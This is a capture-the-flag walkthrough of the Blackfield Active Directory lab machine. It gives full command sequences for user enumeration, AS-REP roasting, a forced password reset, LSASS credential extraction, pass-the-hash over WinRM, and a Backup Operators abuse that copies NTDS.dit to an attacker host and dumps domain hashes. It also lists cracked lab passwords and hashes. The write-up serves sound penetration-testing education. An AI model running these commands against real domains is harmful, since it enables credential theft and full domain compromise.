Overview

Blackfield is an Active Directory machine that demonstrates how exposed SMB profile data can be used to build a user list, leading to AS-REP Roasting, BloodHound-assisted lateral movement, LSASS credential extraction, and eventual domain compromise through Backup Operators privileges.

Attack Chain

  • Enumerate Active Directory services and identify the domain
  • Access profiles$ over SMB and build a potential user list
  • Validate users with kerbrute
  • AS-REP Roast valid users and crack the support hash
  • Enumerate with BloodHound and identify ForceChangePassword over audit2020
  • Reset audit2020 password and access the forensic share
  • Extract svc_backup NTLM hash from an LSASS dump with pypykatz
  • Gain WinRM access as svc_backup
  • Abuse Backup Operators privileges to copy NTDS, SYSTEM, and SECURITY
  • Dump domain hashes with impacket-secretsdump
  • Pass the Administrator hash and obtain root

Enumeration

The initial enumeration starts with a full TCP scan to identify exposed services and confirm whether the target is part of an Active Directory environment.

Port Scanning

export IP=10.129.229.17; export NAME=BLACKFIELD; echo $IP; echo $NAME; ping $IP -c 1

nmap --min-rate 4500 --max-rtt-timeout 1500ms $IP -Pn -n -p- -v -oA scans/nmap_allports_$NAME

ports=$(cat scans/nmap_allports_$NAME.nmap | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//); echo $ports

nmap $IP -p$ports -Pn --disable-arp-ping -sC -sV -oA scans/nmap_initial_$NAME -v

nmap results

Findings

The scan results show a clear Active Directory attack surface. DNS (53), Kerberos (88), RPC (135), LDAP (389), SMB (445), the Global Catalog 3268, and WinRM (5985) are exposed. The LDAP and SMB banners identify the domain as BLACKFIELD.local.

To confirm the LDAP naming context, we query the base DN.

ldapsearch -H ldap://$IP -x -s base namingcontexts

ldapsearch namingcontexts

The domain is added to /etc/hosts so tools can resolve it correctly.

echo "$IP BLACKFIELD.local" | sudo tee -a /etc/hosts

SMB Enumeration

Share Access

With SMB exposed, the next step is to check for accessible shares.

smbclient -N -L //$IP/

smbclient shares

Anonymous SMB enumeration does not behave cleanly, so netexec is used to test access more explicitly.

nxc smb $IP -u '' -p '' --shares

smb shares

This returns STATUS_ACCESS_DENIED. However, when providing any username such as Guest with a blank password, the shares can be listed.

nxc smb $IP -u 'Guest' -p '' --shares

guest smb shares

The profiles$ share is readable, which makes it the first useful enumeration target.

smbclient //$IP/profiles$

profiles share listing

Building a User List

The profiles$ share contains many directories named like user profiles. This gives us a strong source for potential domain usernames.

The raw output is copied into a file called users_raw.txt.

format potential users

Then cleaned into a single-column username list with awk.

cat creds/users_raw.txt | awk '{print $1}' > creds/users_potential.txt
head creds/users_potential.txt

format potential users

Kerbrute Validation

The generated list is then validated with kerbrute to identify real domain users.

~/Tools/kerbrute/kerbrute_linux_amd64 userenum --domain blackfield.local --dc $IP creds/users_potential.txt

kerbrute userenum

Three valid users are identified:

audit2020
support
svc_backup

To make the output easier to reuse, kerbrute is run again with the -o flag.

~/Tools/kerbrute/kerbrute_linux_amd64 userenum --domain blackfield.local --dc $IP creds/users_potential.txt -o creds/kerbrute.userenum.lst

The valid usernames are extracted into clean lists.

grep VALID creds/kerbrute.userenum.lst | awk '{print $7}' | awk -F\@ '{print $1}' > creds/users.txt

clean user lists

grep VALID creds/kerbrute.userenum.lst | awk '{print $7}' | awk -F\@ '{print $2"\\"$1}' > creds/domain_users.txt

clean user lists domain

Foothold

AS-REP Roasting

With valid usernames available, we check whether any account has Kerberos pre-authentication disabled. This is done using impacket-GetNPUsers, which performs an AS-REP Roasting attack.

impacket-GetNPUsers blackfield/ -dc-ip $IP -no-pass -usersfile creds/users.txt -outputfile creds/hashes.aseproast

getnpusers hash

The support account returns an AS-REP hash. Since this can be cracked offline, it is passed to hashcat.

hashcat -m 18200 creds/hashes.aseproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

hashcat support password

The password is recovered successfully.

support:#00^BlackKnight

Authenticated SMB Enumeration

The new credentials are tested. WinRM access is not available for support, but SMB authentication works, so we enumerate shares again.

nxc smb $IP -u 'support' -p '#00^BlackKnight' --shares

support smb shares

The NETLOGON and SYSVOL shares are readable, but recursive enumeration does not reveal anything useful.

python3 ~/Tools/smbmap/smbmap/smbmap.py -H $IP -u "support" -p "#00^BlackKnight" -r NETLOGON --depth 7

python3 ~/Tools/smbmap/smbmap/smbmap.py -H $IP -u "support" -p "#00^BlackKnight" -r SYSVOL --depth 15

Active Directory Enumeration

RPC User Enumeration

Since SMB does not immediately reveal a path forward, we use the support credentials with rpcclient.

rpcclient --user blackfield.local/support --password=#00^BlackKnight $IP

Once authenticated, domain users are enumerated.

enumdomusers

rpc enumdomusers rpc enumdomusers

This returns a much larger list of domain users. The output is saved and cleaned into a file.

cat creds/rpc_users_raw.txt | awk -F \[ '{print $2}' | awk -F \] '{print $1}' > creds/rpc_users.txt

clean rpc users

Several password spraying, AS-REP Roasting, and Kerberoasting attempts are tested against the larger list, but no new credentials are recovered.

BloodHound Enumeration

To look for a relationship-based attack path, bloodhound-python is used to collect Active Directory data.

bloodhound-python -d blackfield.local -u support -p '#00^BlackKnight' -c all -ns $IP

After importing the data into BloodHound, the support user is marked as owned and the Shortest Paths from Owned Objects query is reviewed.

bloodhound owned support

BloodHound reveals that support has ForceChangePassword rights over the audit2020 account.

bloodhound forcechangepassword

Lateral Movement

Resetting audit2020

Since support can change the password for audit2020, we use net rpc to set a known password.

net rpc password audit2020 Password1234! -U blackfield.local/support%#00^BlackKnight -S $IP

The credentials are then tested with netexec.

nxc smb $IP -u audit2020 -p 'Password1234!'

audit2020 password reset

Accessing the forensic Share

With access as audit2020, SMB shares are enumerated again.

python3 ~/Tools/smbmap/smbmap/smbmap.py -H $IP -u "audit2020" -p "Password1234\!"

audit2020 forensic access

The forensic share is now readable. Because smbmap struggles to enumerate it cleanly, we connect manually using smbclient.

smbclient //$IP/forensic --user=blackfield.local/audit2020 --password='Password1234!'

forensic smbclient

To make the share easier to browse, it is mounted locally.

sudo mount -t cifs -o 'username=audit2020,password=Password1234!' //$IP/forensic /mnt

forensic mounted

Inside the memory_analysis directory, an lsass.zip file stands out. Since LSASS can contain credential material, this is immediately worth investigating.

The archive is copied and extracted.

cp /mnt/memory_analysis/lsass.zip .
unzip lsass.zip

lsass zip

Extracting Credentials from LSASS

The LSASS dump is parsed with pypykatz.

pypykatz lsa minidump lsass.DMP

pypykatz lsass

This reveals an NTLM hash for the svc_backup account. An Administrator hash is also visible, but it does not authenticate successfully.

svc_backup:9658d1d1dcd9250115e2205d9f48400d

The svc_backup hash is tested against WinRM.

nxc winrm $IP -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d'

svc_backup winrm validate

WinRM access is confirmed, so an interactive shell is opened.

evil-winrm -i $IP -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d'

svc_backup evil-winrm

We can now read the user flag.

type C:\Users\svc_backup\Desktop\user.txt

user flag

Privilege Escalation

Initial Enumeration

After gaining a shell as svc_backup, we check the account details and group membership.

net user svc_backup /domain

svc_backup net user

The account is a member of Backup Operators, which is highly significant on a domain controller.

We confirm the enabled privileges.

whoami /priv

svc_backup privileges

Both SeBackupPrivilege and SeRestorePrivilege are enabled. This gives us a path to copy protected system files and extract domain hashes.

Preparing Diskshadow

To access locked files like NTDS.dit, we create a shadow copy of the C: drive using diskshadow.

A local script is created with the following contents:

set context persistent nowriters
add volume c: alias temp
create
expose %temp% h:
exit

The script is transferred to the target.

iwr -uri http://10.10.14.89/cmd -o c:\windows\temp\cmd

transfer diskshadow cmd

The first attempt to run diskshadow does not process the script correctly.

diskshadow /s c:\windows\temp\cmd

diskshadow failed format

The issue is caused by the file format. We create a duplicate called diskshadow.txt and convert it to DOS format with unix2dos.

unix2dos diskshadow.txt

unix2dos diskshadow

The corrected script is transferred and executed.

iwr -uri http://10.10.14.89/diskshadow.txt -o c:\windows\temp\diskshadow.txt

diskshadow /s c:\windows\temp\diskshadow.txt

diskshadow success

The shadow copy is exposed as H:.

Copying Protected Files

To make full use of SeBackupPrivilege, we download the PowerShell modules from the SeBackupPrivilege project.

https://github.com/giuliano108/SeBackupPrivilege

iwr -uri http://10.10.14.89/SeBackupPrivilege/SeBackupPrivilegeCmdLets.dll -o ./SeBackupPrivilegeCmdLets.dll

iwr -uri http://10.10.14.89/SeBackupPrivilege/SeBackupPrivilegeUtils.dll -o ./SeBackupPrivilegeUtils.dll

import sebackup modules

Now we can import the PowerShell modules:

Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll

We copy the required files from the shadow copy into C:\Windows\Temp.

Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit c:\windows\temp\NTDS -Overwrite

Copy-FileSeBackupPrivilege h:\windows\system32\config\SYSTEM c:\windows\temp\SYSTEM -Overwrite

Copy-FileSeBackupPrivilege h:\windows\system32\config\SECURITY c:\windows\temp\SECURITY -Overwrite

The files are now visible in C:\Windows\Temp.

ntds files in temp

They are transferred back to the attacking machine over SMB.

copy c:\windows\temp\NTDS \\10.10.14.89\SMBtransfer\NTDS
copy c:\windows\temp\SYSTEM \\10.10.14.89\SMBtransfer\SYSTEM
copy c:\windows\temp\SECURITY \\10.10.14.89\SMBtransfer\SECURITY

transfer ntds files

local ntds files

Dumping Domain Hashes

Once the files are local, impacket-secretsdump is used to extract the domain hashes.

impacket-secretsdump -ntds NTDS -security SECURITY -system SYSTEM LOCAL

secretsdump hashes

The Administrator NTLM hash is recovered.

Administrator:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee

Administrator Access

The recovered hash is validated with netexec.

nxc smb $IP -u 'Administrator' -H '184fb5e5178480be64824d4cd53b99ee'

nxc winrm $IP -u 'Administrator' -H '184fb5e5178480be64824d4cd53b99ee'

administrator hash validate

With WinRM confirmed, we authenticate using pass-the-hash.

evil-winrm -i $IP -u 'Administrator' -H '184fb5e5178480be64824d4cd53b99ee'

administrator shell

Root Flag:

type C:\Users\Administrator\Desktop\root.txt

root flag

Key Takeaways

Blackfield shows how exposed profile data can quickly become a reliable username source. From there, AS-REP Roasting provides the first credential, while BloodHound reveals a clean lateral movement path through ForceChangePassword. The final escalation comes from Backup Operators, where enabled backup privileges allow sensitive domain files to be copied and dumped for full Administrator access.